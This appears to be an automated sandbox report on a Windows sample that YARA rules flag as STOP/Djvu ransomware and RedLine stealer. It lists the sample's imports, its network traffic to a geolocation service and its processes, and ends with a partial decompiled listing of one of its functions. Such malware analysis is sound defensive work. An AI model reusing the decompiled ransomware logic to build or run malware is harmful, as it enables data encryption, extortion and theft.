RT_ICON	0x213a010	0x468	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_DIALOG	0x213a688	0x78	data
RT_STRING	0x213a700	0x67a	data	French	Switzerland
RT_STRING	0x213ad80	0x464	data	French	Switzerland
RT_STRING	0x213b1e8	0x380	data	French	Switzerland
RT_GROUP_ICON	0x21345d8	0x68	data	Kannada	Kanada
RT_GROUP_ICON	0x213a478	0x68	data	Kannada	Kanada
RT_VERSION	0x213a4f0	0x194	data
None	0x213a4e0	0xa	data

Imports

DLL

Import

KERNEL32.dll

GetModuleFileNameA, FoldStringA, GetLocalTime, InterlockedDecrement, GetLocaleInfoA, InterlockedCompareExchange, _hwrite, CancelWaitableTimer, GetSystemDirectoryW, CreateEventW, ReadConsoleA, BuildCommDCBA, GetConsoleAliasExesLengthW, SetSystemTimeAdjustment, PeekConsoleInputW, EnumDateFormatsA, CreateFileW, RegisterWaitForSingleObjectEx, LoadLibraryW, VerifyVersionInfoW, WaitNamedPipeA, GetEnvironmentStrings, FindResourceExA, VirtualProtect, GetFirmwareEnvironmentVariableW, BeginUpdateResourceW, GetConsoleAliasExesLengthA, WriteConsoleA, EnumCalendarInfoExA, WriteConsoleW, DeleteFileW, FillConsoleOutputCharacterA, GetProcAddress, GetModuleHandleW, GetUserDefaultLCID, FindFirstChangeNotificationW, GetFileAttributesExA, GetCalendarInfoA, SetConsoleTitleA, GetBinaryTypeW, GlobalAlloc, GetComputerNameExA, FindNextFileA, OpenJobObjectA, HeapSize, _lclose, GetComputerNameW, TlsGetValue, SetCalendarInfoW, SetComputerNameW, CreateDirectoryExA, InitializeCriticalSectionAndSpinCount, FindFirstChangeNotificationA, GetVolumePathNameA, LoadLibraryA, GetProcessHandleCount, GetThreadLocale, GetSystemDefaultLangID, GetCurrentProcess, ReadFile, HeapFree, GetDiskFreeSpaceW, GetProcessHeap, RaiseException, RtlUnwind, MultiByteToWideChar, GetCommandLineW, HeapSetInformation, GetStartupInfoW, EncodePointer, HeapAlloc, GetLastError, IsProcessorFeaturePresent, DecodePointer, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, WriteFile, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CreateFileA, LCMapStringW, GetStringTypeW, HeapReAlloc, SetEndOfFile

USER32.dll

ClientToScreen

Possible Origin

Language of compilation system	Country where language is spoken	Map
Kannada	Kanada
French	Switzerland

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 11:12:25.482526064 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:25.482600927 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:25.482718945 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:25.501522064 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:25.501563072 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:25.570105076 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:25.570306063 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.063847065 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.063880920 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:26.064246893 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:26.064321041 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.068742037 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.103678942 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:26.103773117 CEST	443	49737	162.0.217.254	192.168.2.3
Aug 5, 2022 11:12:26.103781939 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.103825092 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.187181950 CEST	49737	443	192.168.2.3	162.0.217.254
Aug 5, 2022 11:12:26.187218904 CEST	443	49737	162.0.217.254	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 11:12:25.400958061 CEST	64851	53	192.168.2.3	8.8.8.8
Aug 5, 2022 11:12:25.428997040 CEST	53	64851	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 5, 2022 11:12:25.400958061 CEST	192.168.2.3	8.8.8.8	0x62d8	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 5, 2022 11:12:25.428997040 CEST	8.8.8.8	192.168.2.3	0x62d8	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.2ip.ua

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49737	162.0.217.254	443	C:\Users\user\Desktop\bP5g4FsSJk.exe

Timestamp	Direction	Data
2022-08-05 09:12:26 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-08-05 09:12:26 UTC	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 05 Aug 2022 09:12:26 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-08-05 09:12:26 UTC	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: bP5g4FsSJk.exePID: 5468, Parent PID: 2216

General

Target ID:	0
Start time:	11:12:11
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\bP5g4FsSJk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bP5g4FsSJk.exe"
Imagebase:	0x400000
File size:	748032 bytes
MD5 hash:	28FB096CBCE32CF1F87719254452014F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bP5g4FsSJk.exePID: 5604, Parent PID: 5468

General

Target ID:	1
Start time:	11:12:18
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\bP5g4FsSJk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bP5g4FsSJk.exe"
Imagebase:	0x400000
File size:	748032 bytes
MD5 hash:	28FB096CBCE32CF1F87719254452014F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.271002067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: bP5g4FsSJk.exePID: 5468, Parent PID: 2216COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	63.2%
Signature Coverage:	52.6%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Executed Functions

Function 042357C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 042357EE
Module32First.KERNEL32(00000000,00000224), ref: 0423580E

Memory Dump Source

Source File: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, Offset: 04235000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4235000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8334af5c24ff396c3e57d2a711d098a83e2d207c306642220dedcd781755e3e1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 23F06271310711BFD7203FB5A88DA6E76F8AF49726F100668E64A960C0DA70F8854661

Uniqueness

Uniqueness Score: -1.00%

Function 04235485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 042354D6

Memory Dump Source

Source File: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, Offset: 04235000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4235000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: fc30bedd1a3e4da8273c7df02b8ad4845a9fa982c6ffc942aea45ab7815bb07d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 69112879A00208FFDB01DF98C985E99BBF5AF08351F0580A4F9489B361D371EA90EB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0423671C Relevance: .1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, Offset: 04235000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4235000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: 84c589ef5366da8afdc420f38a5a07b1b38247103ceecb84141386d18900fb50
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 6A3199B9A26242AFDB25CF30D891AB5BB74EF8B325F5895DCC0C18B002D325A04BC794

Uniqueness

Uniqueness Score: -1.00%

Function 042350A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, Offset: 04235000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4235000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: c7e856ab7ab5461a7d600a8e87308a9064c1637bc65850b8a3105e9ae23e7453
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 0D1170B2350101AFD754DF55DCC0EA673EAEB89225B198065ED08CB312E676EC42C760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bP5g4FsSJk.exePID: 5604, Parent PID: 5468COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	39%
Total number of Nodes:	498
Total number of Limit Nodes:	16

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, int _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, intOrPtr _a72, intOrPtr _a80, char _a84, WCHAR* _a88, char _a96, intOrPtr _a100, struct tagMSG _a104, int _a108, char _a116, WCHAR* _a124, char _a128, char _a132, int _a144, int _a148, char _a156, char _a160, int _a176, int _a180, char _a196, char _a200, char _a204, int _a216, int _a220, char _a228, char _a232, int _a244, int _a248, char _a252, char _a260, char _a264, struct tagMSG _a272, struct tagMSG _a276, int _a280, int _a284, intOrPtr _a288, int _a292, char _a300, char _a304, char _a320, int _a336, int _a340, char _a380, short _a388, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a892, char _a896, short _a968, char _a984, char _a3248, short _a3252) {
				intOrPtr _v0;
				int _v4;
				long _v8;
				WCHAR** _v12;
				short* _v16;
				int _v20;
				CHAR* _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				void* __esi;
				void* _t525;
				void* _t526;
				void* _t528;
				int _t530;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t556;
				int _t557;
				WCHAR** _t566;
				void* _t570;
				void* _t573;
				int _t581;
				void* _t585;
				void* _t588;
				intOrPtr* _t590;
				int _t592;
				void* _t594;
				CHAR* _t596;
				void* _t599;
				void* _t602;
				void* _t608;
				void* _t614;
				int* _t618;
				short* _t677;
				void* _t697;
				void* _t707;
				void* _t723;
				void* _t727;
				long _t728;
				long _t729;
				void* _t730;
				void* _t746;
				long _t747;
				void* _t751;
				void* _t754;
				long _t755;
				void* _t759;
				void* _t765;
				signed int _t770;
				void* _t773;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t788;
				signed int _t789;
				void* _t790;
				void* _t799;
				void* _t800;
				void* _t817;
				void* _t828;
				void* _t839;
				short* _t846;
				void* _t856;
				void* _t859;
				char* _t861;
				void* _t865;
				long _t868;
				intOrPtr* _t879;
				void* _t881;
				void* _t895;
				void* _t896;
				void* _t897;
				void* _t898;
				void* _t899;
				void* _t901;
				void* _t903;
				long _t916;
				signed int _t917;
				void* _t919;
				WCHAR** _t923;
				WCHAR** _t949;
				WCHAR* _t950;
				void* _t952;
				int* _t955;
				int* _t958;
				int* _t960;
				intOrPtr _t962;
				int _t966;
				WCHAR** _t968;
				void* _t969;
				void* _t974;
				intOrPtr* _t982;
				void* _t983;
				intOrPtr* _t986;
				void* _t987;
				WCHAR* _t989;
				signed int _t990;
				signed int _t991;
				WCHAR* _t995;
				signed int _t996;
				signed int _t997;
				WCHAR* _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr* _t1005;
				void* _t1006;
				char* _t1008;
				intOrPtr* _t1011;
				void* _t1012;
				char* _t1014;
				intOrPtr* _t1017;
				void* _t1018;
				char* _t1020;
				intOrPtr* _t1136;
				void* _t1137;
				short* _t1142;
				void* _t1145;
				intOrPtr _t1159;
				intOrPtr _t1161;
				intOrPtr* _t1164;
				intOrPtr* _t1167;
				short* _t1168;
				short* _t1171;
				short* _t1173;
				intOrPtr* _t1175;
				intOrPtr* _t1178;
				intOrPtr* _t1181;
				intOrPtr* _t1191;
				int _t1197;
				int _t1198;
				WCHAR* _t1199;
				short* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				short* _t1205;
				signed int _t1206;
				int* _t1207;
				signed int _t1208;
				int* _t1209;
				signed int _t1210;
				int* _t1211;
				intOrPtr* _t1212;
				unsigned int _t1215;
				signed int _t1217;
				void* _t1220;
				int* _t1226;
				void* _t1227;
				int _t1230;
				short* _t1231;
				int _t1232;
				int _t1233;
				int _t1234;
				int _t1235;
				char _t1236;
				int _t1242;
				signed int _t1244;
				short* _t1245;
				long _t1248;
				void* _t1249;
				signed int _t1263;
				signed int _t1264;
				void* _t1266;
				void* _t1268;
				void* _t1269;
				short* _t1270;
				void* _t1271;
				short* _t1272;
				void* _t1273;
				void* _t1274;
				char* _t1275;
				void* _t1276;
				void* _t1277;
				char* _t1278;
				void* _t1279;
				void* _t1280;
				char* _t1281;
				void* _t1282;
				void* _t1283;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1290;
				void* _t1292;
				short* _t1294;

				_t1264 = _t1263 & 0xfffffff8;
				E0042F7C0(0x14c4);
				_push(__ebx);
				_push(__edi);
				 *0x513244 = _a4; // executed
				_t525 = E0040CF10(); // executed
				if(_t525 == 0) {
					_t526 = GetCurrentProcess();
					GetLastError();
					_t528 = SetPriorityClass(_t526, 0x80); // executed
					__eflags = _t528;
					if(__eflags == 0) {
						GetLastError();
					}
					_t1226 =  *0x529228; // 0x8cceb0
					_a52 = 0;
					_a56 = 0;
					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
					_t1159 =  *0x52922c; // 0x0
					_t974 = 0xffffffe - _t1159;
					_t1197 = _t530;
					__eflags = _t974 - 1;
					if(__eflags < 0) {
						_push("list<T> too long");
						E0044F23E(__eflags);
						goto L213;
					} else {
						 *0x52922c = _t1159 + 1;
						_t1226[1] = _t1197;
						 *( *(_t1197 + 4)) = _t1197;
						_t556 = E00419D10( &_a984);
						_t1226 =  *0x513268;
						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
						_t1161 =  *0x51326c;
						_t974 = 0x1cb189 - _t1161;
						_t1198 = _t557;
						__eflags = _t974 - 1;
						if(__eflags < 0) {
							L213:
							_push("list<T> too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1226);
							_t1227 = _t974;
							__eflags =  *(_t1227 + 0x8dc) - 0x10;
							if( *(_t1227 + 0x8dc) >= 0x10) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8dc) = 0xf;
							 *(_t1227 + 0x8d8) = 0;
							 *((char*)(_t1227 + 0x8c8)) = 0;
							__eflags =  *(_t1227 + 0x8b8) - 8;
							if( *(_t1227 + 0x8b8) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8b8) = 7;
							 *(_t1227 + 0x8b4) = 0;
							 *((short*)(_t1227 + 0x8a4)) = 0;
							_t534 =  *(_t1227 + 0x898);
							__eflags = _t534;
							if(_t534 != 0) {
								E00414F10(_t534,  *(_t1227 + 0x89c));
								L00422587( *(_t1227 + 0x898));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x898) = 0;
								 *(_t1227 + 0x89c) = 0;
								 *(_t1227 + 0x8a0) = 0;
							}
							_t535 =  *(_t1227 + 0x88c);
							__eflags = _t535;
							if(_t535 != 0) {
								E00414F10(_t535,  *(_t1227 + 0x890));
								L00422587( *(_t1227 + 0x88c));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x88c) = 0;
								 *(_t1227 + 0x890) = 0;
								 *(_t1227 + 0x894) = 0;
							}
							_t536 =  *(_t1227 + 0x880);
							__eflags = _t536;
							if(_t536 != 0) {
								E00414F10(_t536,  *(_t1227 + 0x884));
								L00422587( *(_t1227 + 0x880));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x880) = 0;
								 *(_t1227 + 0x884) = 0;
								 *(_t1227 + 0x888) = 0;
							}
							__eflags =  *(_t1227 + 0x87c) - 8;
							if( *(_t1227 + 0x87c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x87c) = 7;
							 *(_t1227 + 0x878) = 0;
							 *((short*)(_t1227 + 0x868)) = 0;
							__eflags =  *(_t1227 + 0x864) - 8;
							if( *(_t1227 + 0x864) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x864) = 7;
							 *(_t1227 + 0x860) = 0;
							 *((short*)(_t1227 + 0x850)) = 0;
							__eflags =  *(_t1227 + 0x84c) - 8;
							if( *(_t1227 + 0x84c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x84c) = 7;
							 *(_t1227 + 0x848) = 0;
							 *((short*)(_t1227 + 0x838)) = 0;
							__eflags =  *(_t1227 + 0x834) - 8;
							if( *(_t1227 + 0x834) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x834) = 7;
							 *(_t1227 + 0x830) = 0;
							 *((short*)(_t1227 + 0x820)) = 0;
							__eflags =  *(_t1227 + 0x1c) - 8;
							if( *(_t1227 + 0x1c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 8)));
							}
							 *(_t1227 + 0x1c) = 7;
							__eflags = 0;
							 *(_t1227 + 0x18) = 0;
							 *((short*)(_t1227 + 8)) = 0;
							return 0;
						} else {
							 *0x51326c = _t1161 + 1;
							_t1226[1] = _t1198;
							 *( *(_t1198 + 4)) = _t1198;
							L214();
							_a32 = 0;
							_a44 = 0;
							_t1230 =  *( *0x513268);
							_v4 = _t1230;
							_a52 = _t1230;
							E00413A90(0,  &_a128, _t1198, 0x400);
							_t1199 = _a124;
							GetModuleFileNameW(0, _t1199, 0x400);
							PathRemoveFileSpecW(_t1199);
							_push(_a72);
							_a180 = 7;
							_a176 = 0;
							_a160 = 0;
							E00418400( &_a160, _t1199, _a128);
							_t1200 = _t1230 + 0x10;
							__eflags = _t1200 -  &_a148;
							if(_t1200 !=  &_a148) {
								__eflags =  *(_t1200 + 0x14) - 8;
								if( *(_t1200 + 0x14) >= 8) {
									L00422587( *_t1200);
									_t1264 = _t1264 + 4;
								}
								__eflags = 0;
								 *(_t1200 + 0x14) = 7;
								 *(_t1200 + 0x10) = 0;
								 *_t1200 = 0;
								E004145A0(_t1200,  &_a160);
							}
							__eflags = _a180 - 8;
							if(_a180 >= 8) {
								L00422587(_a160);
								_t1264 = _t1264 + 4;
							}
							_a44 = 0;
							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
							_a28 = _t566;
							lstrcpyW( &_a3252,  *_t566);
							_t1201 = 1;
							__eflags = _a36 - 1;
							if(_a36 <= 1) {
								L26:
								GlobalFree(_a28);
								__eflags =  *0x513235;
								if( *0x513235 == 0) {
									_t570 = E00412220(); // executed
									__eflags = _t570 - 1;
								} else {
									__eflags = E00412220() - 2;
								}
								if(__eflags <= 0) {
									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa);
									_t949 = _v12;
									_t1266 = _t1264 + 4;
									_a148 = 0xf;
									_t1202 = 0;
									__eflags = 0;
									_a144 = 0;
									_a128 = 0;
									do {
										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
										__eflags =  *_t1164;
										if( *_t1164 != 0) {
											_t982 = _t1164;
											_v12 = _t982 + 1;
											do {
												_t573 =  *_t982;
